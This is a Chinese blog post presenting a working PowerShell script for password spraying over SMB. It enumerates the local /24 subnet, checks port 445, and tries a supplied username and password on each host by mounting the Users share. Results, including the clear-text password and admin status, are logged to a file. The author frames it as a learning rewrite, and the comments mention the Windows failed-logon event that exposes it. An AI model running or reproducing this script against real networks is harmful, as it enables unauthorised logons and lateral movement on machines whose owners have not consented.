
powershell爆破smb的小脚本

还不是十分的满意,等待后续的优化…

脚本编写

原有的脚本来自于infosecMatter,经过实际测试发现存在BUG(或许就我一个人碰到了?),总的来说重写更多的是为了学习,而不是真的当作攻击脚本去使用(效率太低了…hhh)

# Works
# Script parameters. Both are positional: ./smb.ps1 <user> <password>.
[CmdletBinding()]
param(
# Account name. A leading ".\" (local-account shorthand) is rewritten to
# "<host>\" inside smblogin-worker before the credential is built.
[Parameter(
Position=0
)]
[String]
$user,

# Clear-text password. smblogin writes it verbatim into results.txt
# ("ip,user,pass,verdict"), so that file contains a credential and must be
# protected and cleaned up like one.
[Parameter(
Position=1
)]
[String]
$pass
);

# Entry point. Prints usage and returns when no password was given; otherwise
# derives a /24 prefix from the local ipconfig output, writes <prefix>.2 - .254
# to hosts.txt in the current directory, and calls smblogin.
# Globals read: $pass. Files written: hosts.txt (appended).
Function iplist{
if (!$pass) {
Write-Host "usage: ./smb.ps1 <user> <password>"
Write-Host " e.g.: ./smb.ps1 .\Administrator P@ssw0rd`n"
return
}
Write-Host "Get IP..."
$ip_tmp = ipconfig | Out-String;
# Three dot-separated groups of 2-3 digits. The first such group anywhere in
# the ipconfig text becomes the prefix. Note that "-match" against a single
# string returns a Boolean, so $ip holds $true/$false; the matched text is
# read back from the automatic $Matches[0].
$ip_regex = "\d{2,3}\.\d{2,3}\.\d{2,3}";
$ip = $ip_tmp -match $ip_regex;
$i = 2;
# ">>" appends, so hosts.txt accumulates across runs unless the previous run
# reached the Remove-Item at the end of smblogin.
while($i -lt 255){
echo ($Matches[0] + ".$i") >> hosts.txt;
$i++;
}
Write-Host "Success!"
Write-Host "Attempt attack..."
smblogin;
}

# One authentication attempt: tries to map \\$h\Users with $u/$p and classifies
# the result from the error text. Emits exactly one of "True,admin", "True",
# "False" or "Error" to the pipeline (the caller appends it to its CSV line).
# Every call is a real SMB logon against $h; the target records it in its
# security log as a successful or failed logon (failed: Windows Event ID 4625),
# which is the primary detection point for this script.
Function smblogin-worker($h,$u,$p) {
# ".\user" becomes "<host>\user" so the credential is evaluated against $h's local accounts.
$u = $u -replace "^\.\\", "$h\"
$c = New-Object System.Management.Automation.PSCredential $u, ($p | ConvertTo-SecureString -AsPlainText -Force)
try {
# Choose the share for the situation: \\$h\Users or \\$h\Admin$
if (New-PSDrive -Name Share -PSProvider FileSystem -Root \\$h\Users -Credential $c -EA SilentlyContinue) {
Remove-PSDrive Share
echo "True,admin"
} else {
# -EA SilentlyContinue suppresses output but the failure is still recorded in
# $error; the verdict depends on the English message text of $error[0].
if ($error[0].exception -Match 'password is incorrect') {
echo "False"
} elseif ($error[0].exception -Match 'Access is denied') {
# Treated by the script as: credential accepted, share access refused.
echo "True"
}else{
# Any other error text is reported as a failed guess.
echo "False"
}
}
} catch {
echo "Error"
}
}

# TCP reachability probe.
# Arguments: $rh - host, $rp - port
# Returns:   $true when a TCP connection to $rh:$rp completes within 3 seconds,
#            $false on timeout or on any socket/connect exception.
Function worker-test-port {
  param($rh,$rp)
  $timeoutMs = 3 * 1000
  try {
    $client = new-Object system.Net.Sockets.TcpClient
    $pending = $client.BeginConnect($rh,$rp,$null,$null)
    if (-not $pending.AsyncWaitHandle.WaitOne($timeoutMs,$false)) {
      # No answer inside the window: abandon the pending connect.
      $client.Close()
      return $false
    }
    # Completing the connect surfaces a refused/failed connection as an exception.
    $null = $client.EndConnect($pending)
    $client.Close()
    return $true
  } catch {
    return $false
  }
}

# Tries the single $user/$pass pair against every address listed in hosts.txt.
# Appends one "ip,user,pass,verdict" line per attempt to results.txt (ASCII,
# plain text, password included), skipping addresses already recorded as
# found, or as already tried with this exact password. Deletes hosts.txt at
# the end. Globals read: $user, $pass.
Function smblogin{
$hosts = "hosts.txt"
$results = ".\results.txt"
$start = date
echo "Start: $start" | Out-File -Encoding ascii -Append $results
# Escape "\" and "." in the user name so it can be embedded in the sls regexes
# below. $pass is embedded in the second regex without such escaping.
$userm = ($user -replace "\\", "\\") -replace "\.", "\."
foreach($ip in gc "$hosts") {
Write-Host "Target:"$ip
# Skip hosts where an earlier line already reports a working credential for $user.
$x = (gc $results -EA SilentlyContinue | sls "^$ip,$userm,.*,True")
if ($x) {
Write-Host "user $user on $ip already found"
continue
}
# Skip hosts where exactly this password was already tried (case-sensitive).
$x = (gc $results -EA SilentlyContinue | sls -CaseSensitive "^$ip,$userm,$pass,")
if ($x) {
Write-Host "user $user on $ip with $pass already tried"
continue
}
# Only hosts answering on TCP 445 are attempted (3 s connect timeout).
if (!(worker-test-port $ip 445)) {
Write-Host "$ip,445,Port unreachable"
continue
}
$output = "$ip,$user,$pass,"
$output += smblogin-worker $ip $user $pass
Write-Host "$output"
echo $output | Out-File -Encoding ascii -Append $results
}
$end = date
echo "End: $end" | Out-File -Encoding ascii -Append $results
# Only reached on a normal exit; an interrupted run leaves hosts.txt behind and
# the next iplist run appends to it.
Remove-Item "hosts.txt"
}
# Script body: everything runs from iplist (argument check, host list, then smblogin).
iplist;